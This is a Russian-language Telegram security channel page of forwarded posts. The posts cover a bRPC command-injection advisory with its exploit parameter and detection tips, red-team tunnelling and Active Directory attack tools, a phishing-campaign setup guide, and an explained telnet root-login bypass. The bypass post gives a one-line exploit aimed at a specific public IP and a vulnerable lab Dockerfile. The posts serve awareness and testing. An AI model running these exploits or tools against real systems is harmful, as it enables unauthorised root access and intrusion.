Fsecurity | HH
2.07K subscribers
1.73K photos
105 videos
62 files
6.17K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
Forwarded from SecuriXy.kz
🚨 Критическая RCE‑уязвимость в Apache bRPC (CVE‑2025‑60021)
Критичность: CVSS 9.8
Тип: RCE
Компонент: встроенный сервис heap‑профайлера (`/pprof/heap`)

В Apache bRPC параметр extra_options в эндпоинте /pprof/heap передается напрямую в командную строку jemalloc‑профайлера без какой‑либо фильтрации.

🎯 Уязвимые версии
Все версии до 1.15.0.

🔥 Эксплуатация

/pprof/heap?extra_options=<cmd>

🔗 PoC:
https://github.com/ninjazan420/CVE-2025-60021-PoC-Apache-bRPC-Heap-Profiler-Command-Injection

🛡 Рекомендации
1. Обновиться до bRPC 1.15.0
2. Либо применить патч из апстрима
3. Закрыть доступ к /pprof/* извне
4. Отключить heap‑профайлер, если он не нужен

🔍 Детекты
Искать обращения к /pprof/heap с параметрами:
`extra_options=
extra_options=% (URL‑encoded)
extra_options= внутри JSON или multipart`
👎1
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from 1N73LL1G3NC3
Chisel-ng

A Rust implementation of chisel for penetration testing and red team operations. Establishes reverse tunnels over SSH-over-WebSocket-over-TLS, allowing operators to pivot through compromised hosts while blending with normal HTTPS traffic.
👍1
Forwarded from AD_POHEQUE
ADScan оснастка для автоматизированного тестирования и пост-эксплуатации Active Directory

позавчера помер crackmapexec, вчера бранясь переезжали на netexec, половина приёмов в powershell, половина в python и каждый раз всё собирается руками под конкретный проект.

вопрос: зачем ещё один AD-сканер, если у всех уже есть все перечисленное выше?

инструмент работает в связке с bloodhound-ce:
- самостоятельно строит цепь эксплуатации: разведка → bloodhound → kerberos-атаки → обработка хэшей и работа с уязвимыми аклями
- живёт как агент: выбрал сценарий, дал учетные данные — он прогнал плейбук и передал лут
- пригоден под оркестрацию, но придется написать собственный mcp

без ai внутри и это скорее плюс.

можно побаловаться и порешать тачки на HTB что бы освоиться. разработчик предоставил демо в котором ADScan прорешал Forest за 3 минуты.

репозиторий:
https://github.com/ADScanPro/adscan
документация:
https://www.adscanpro.com/docs

🤩
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Autoposter)
🖖Гайд по GoPhish: полный цикл настройки

Запустить реалистичную фишинговую рассылку с высоким Inbox Rate — задача не для новичков.
Команда ScanFactory подготовила серию из 3 статей, чтобы даже начинающий специалист смог разобраться в настройке «от и до» и запустить реалистичные фишинговые кампании.

1⃣ Установка GoPhish на VPS

2⃣ Настройка почтового сервера и SPF/DKIM/DMARC

3⃣ Создание фишингового сайта и интеграция с кампанией

Серия охватывает весь процесс: подготовку инфраструктуры, повышение доставляемости писем, создание реалистичных страниц и практическую сборку рабочей схемы для контролируемых фишинговых кампаний.

👉 Подписывайся на канал ScanFactory, чтобы не пропустить полезные гайды и практические кейсы.
#реклама
О рекламодателе
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from вольтаж
взломать интернет бесплатно 2026

USER="-f root" telnet -a 104.16.149.244 23


вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.

что? 🐱

Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.

Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.

Без Kerberos, этот юзернейм попросту не детектился.

Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.

Новый шаблон:

/usr/bin/login " -p -h %h %?u{-f %u}{%U}"



и вот тут происходит кабум бабах ракета взрыв 🤯

1. В бинаре login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"

2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе $USER с целевым логином

3. содержимое $USER переменной никак не санитизируется

. . .
Теперь перечитай эксплойт

USER="-f root" telnet -a 104.16.149.244 23


Да это же уязвимость на argument injection!


Повторим флоу атаки 🃏

0. выставляем переменную $USER="-f root" и включаем автологин -a

1. переменная $USER не проверяется, но учитывается сервером

2. $USER подставляется в шаблон логина вместо {%U}

3. сервер получает команду /usr/bin/login -p -f root

4. бинарь login скипает аутентификацию из-за -f

5. поздравляю, ты root

———
Dockerfile для тестовой лабы


FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

COPY docker-entrypoint.sh /docker-entrypoint.sh

EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]



Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1